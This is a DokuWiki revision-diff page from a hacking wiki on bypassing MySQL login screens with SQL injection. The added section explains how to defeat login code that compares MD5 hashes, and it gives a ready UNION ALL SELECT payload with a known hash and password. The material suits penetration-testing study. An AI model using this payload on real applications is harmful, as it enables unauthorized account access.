User Tools

Site Tools


hacking:sql_injection:mysql:bypassing_login_screens

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision
Previous revision
hacking:sql_injection:mysql:bypassing_login_screens [2020/04/16 22:19] – created peterhacking:sql_injection:mysql:bypassing_login_screens [2020/07/15 09:30] (current) – external edit 127.0.0.1
Line 29: Line 29:
 ---- ----
  
 +===== Bypassing second MD5 hash check login screens =====
 +
 +If the application is first getting the record by username and then compares the returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication.
 +
 +You can union results with a known password and MD5 hash of supplied password.
 +
 +In this case, the application will compare your password and your supplied MD5 hash instead of MD5 from the database.
 +
 +<code sql>
 +Username :admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
 +Password : 1234
 +</code>
 +
 +<WRAP info>
 +**NOTE:**  81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
 +</WRAP>
  
hacking/sql_injection/mysql/bypassing_login_screens.1587075582.txt.gz · Last modified: 2020/07/15 09:30 (external edit)

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki